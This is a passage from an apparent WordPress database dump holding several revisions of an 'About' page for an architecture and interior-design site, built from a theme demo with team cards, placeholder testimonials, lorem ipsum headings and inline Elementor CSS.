href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:13:57','2023-05-25 10:13:57','',38,'https://bauhaus.futuremediatrix.com/?p=4746',0,'revision','',0),(4747,2,'2023-05-25 10:13:57','2023-05-25 10:13:57','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:13:57','2023-05-25 10:13:57','',38,'https://bauhaus.futuremediatrix.com/?p=4747',0,'revision','',0),(4748,2,'2023-05-25 10:13:57','2023-05-25 10:13:57','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:13:57','2023-05-25 10:13:57','',38,'https://bauhaus.futuremediatrix.com/?p=4748',0,'revision','',0),(4749,2,'2023-05-25 10:17:10','2023-05-25 10:17:10','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>LOREM IPSUM</h3>\n														<h2>\n								LOREM IPSUM\n							</h2>\n		<p>Redesign Life</p><p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n											